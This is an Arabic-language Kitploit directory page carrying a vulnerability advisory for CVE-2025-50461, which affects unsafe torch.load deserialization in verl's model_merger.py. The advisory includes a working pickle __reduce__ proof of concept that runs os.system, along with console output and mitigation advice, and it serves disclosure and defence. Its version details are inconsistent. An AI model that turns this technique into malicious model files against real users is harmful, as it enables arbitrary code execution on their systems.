Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-50461 — Technical Details and Exploit for CVE-2025-50461 | Kitploit
أدوات/GitHubGitHub/anchor0221/cve-2025-50461
Payload GenerationVulnerability AnalysisExploitationPapers & ResearchLearning & EducationBinary Exploitation
GitHubanchor0221/cve-2025-50461

CVE-2025-50461

Technical Details and Exploit for CVE-2025-50461

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-50461: تنفيذ التعليمات البرمجية عن بُعد عبر إلغاء تسلسل النموذج غير الآمن في Verl

الحالة: محجوز
تم تعيين معرف CVE هذا ولكنه لم يُنشر بعد في قائمة CVE الرسمية.

توجد ثغرة في إلغاء التسلسل في إصدار verl 3.0.0 من Volcengine، وتحديدًا في ملف scripts/model_merger.py عند استخدام الواجهة الخلفية "fsdp". يستدعي السكربت الدالة torch.load() مع تعيين weights_only=False على ملفات .pt المقدمة من المستخدم، مما يسمح للمهاجمين بتنفيذ تعليمات برمجية عشوائية إذا تم تحميل ملف نموذج ضار. يمكن للمهاجم استغلال ذلك بإقناع الضحية بتنزيل ملف نموذج ضار ووضعه في دليل محلي بنمط اسم ملف محدد. قد تؤدي هذه الثغرة إلى تنفيذ تعليمات برمجية عشوائية بصلاحيات المستخدم الذي يشغل السكربت.

الوصف

المستودع المتأثر

  • المشروع: volcengine/verl
  • الإصدارات المتأثرة: <= v0.4.0
  • الملف: scripts/model_merger.py
  • الرابط الدائم على GitHub: https://github.com/volcengine/verl/blob/v0.3.0.post1/scripts/model_merger.py#L87
  • التبعية: PyTorch < 2.6.0

إثبات المفهوم (PoC)

الخطوة 1: إنشاء ملف نموذج ضار (malicious.pt)

root@kitploit:~
import pickle
import os

class Malicious:
    def __reduce__(self):
        return (os.system, ("mkdir HACKED!",))

with open("malicious.pt", "wb") as f:
    pickle.dump(Malicious(), f)

الخطوة 2: إعادة التسمية والوضع

root@kitploit:~
mv malicious.pt model_world_size_4_rank_0.pt
mkdir TESTS
mv model_world_size_4_rank_0.pt TESTS/

الخطوة 3: تنفيذ السكربت المعرض للثغرة

root@kitploit:~
python scripts/model_merger.py --backend="fsdp" --local_dir="TESTS" --hf_model_path="TESTS"

النتيجة

root@kitploit:~
root@99137c7690ee:/workspace/verl-main# python scripts/model_merger.py --backend="fsdp" --local_dir="TESTS" --hf_model_path="TESTS"
Traceback (most recent call last):
  File "/workspace/verl-main/scripts/model_merger.py", line 440, in <module>
    convert_fsdp_checkpoints_to_hfmodels()
  File "/workspace/verl-main/scripts/model_merger.py", line 88, in convert_fsdp_checkpoints_to_hfmodels
    state_dict = torch.load(os.path.join(local_dir, f'model_world_size_{world_size}_rank_{rank}.pt'),
  File "/usr/local/lib/python3.10/dist-packages/torch/serialization.py", line 1384, in load
    return _legacy_load(
  File "/usr/local/lib/python3.10/dist-packages/torch/serialization.py", line 1630, in _legacy_load
    raise RuntimeError("Invalid magic number; corrupt file?")
RuntimeError: Invalid magic number; corrupt file?
root@99137c7690ee:/workspace/verl-main# ls
'HACKED!'   Notice.txt   TESTS   docker   examples   outputs   pyproject.toml       requirements.txt          scripts    test_prime.sh   tmp    verl.egg-info
 LICENSE    README.md    data    docs     patches    recipe    requirements_sglang.txt   setup.py   tests           verl   verl_demo.log

تم تنفيذ الأمر mkdir HACKED! على نظام الضحية.

التخفيف

  • الترقية إلى إصدار PyTorch 2.6.0 أو أحدث، والذي يعيّن weights_only=True بشكل افتراضي، مما يقلل من مخاطر إلغاء التسلسل.
  • تعديل الكود لتعيين weights_only=True صراحةً عند استدعاء torch.load.
  • تنفيذ التحقق من سلامة ملف النموذج قبل التحميل.
  • توعية المستخدمين بعدم تحميل النماذج من مصادر غير موثوقة.

مثال على التحميل الآمن:

root@kitploit:~
state_dict = torch.load(path, map_location="cpu", weights_only=True)

حالة CVE

المؤلف

  • اكتشفه: Yu Rong (戎誉) و Hao Fan (凡浩)
  • جهة الاتصال: [[email protected]]
تنزيل الأداة
الحقلالقيمة
معرف CVECVE-2025-50461
درجة CVSSقيد التحديد
CWECWE-502: إلغاء تسلسل البيانات غير الموثوقة
تاريخ التقرير2025-04-30
تاريخ الإفصاح2025-08-15
الإصدار المتأثر<= v0.4.0
إصدار الإصلاح